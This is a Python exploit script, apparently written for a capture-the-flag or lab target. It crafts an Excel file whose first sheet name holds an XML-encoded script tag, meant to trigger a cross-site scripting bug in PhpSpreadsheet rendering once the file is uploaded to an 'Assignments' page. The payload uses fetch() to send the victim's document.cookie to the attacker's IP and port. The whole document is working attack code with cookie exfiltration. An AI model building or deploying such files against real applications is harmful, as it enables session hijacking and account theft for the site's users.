import zipfile
import shutil
import os
from openpyxl import Workbook

# --- CONFIGURATION ---
MY_IP = "TUN0_IP"
PORT = "8000"
FILENAME = "assignment_exploit.xlsx"

# 1. Create a "Clean" Excel file first (Standard compliant)
print("[*] Creating template Excel file...")
wb = Workbook()
ws = wb.active
ws.title = "INJECT_HERE" # Placeholder we will find and replace
wb.create_sheet("Sheet2") # Crucial: 2nd sheet is required to trigger the bug
wb.save(FILENAME)

# 2. Define the Malicious Payload
# We must XML-encode the characters (< becomes &lt;) so the XML parser reads it,
# but PhpSpreadsheet converts it back to code.
payload = f"&lt;script&gt;fetch('http://{MY_IP}:{PORT}/?c='+document.cookie)&lt;/script&gt;"

print(f"[*] Constructing payload: {payload}")

# 3. Inject the Payload manually using Zip manipulation
# We are bypassing OpenPyXL's validation by editing the raw XML.
print("[*] Injecting payload into xl/workbook.xml...")

temp_file = "temp_exploit.xlsx"
# Copy existing xlsx to a temp file
shutil.copyfile(FILENAME, temp_file)

with zipfile.ZipFile(temp_file, 'r') as zin:
    with zipfile.ZipFile(FILENAME, 'w') as zout:
        for item in zin.infolist():
            # Read the file content
            data = zin.read(item.filename)
            
            # If it's the workbook configuration, inject the payload
            if item.filename == 'xl/workbook.xml':
                # Replace the placeholder with our malicious XSS
                # We use .replace() on bytes
                data = data.replace(b'name="INJECT_HERE"', f'name="{payload}"'.encode('utf-8'))
            
            # Write data back to the new zip
            zout.writestr(item, data)

# Cleanup
os.remove(temp_file)
print(f"[+] Success! Malicious file '{FILENAME}' created.")
print(f"[+] Upload this file to the Assignments page.")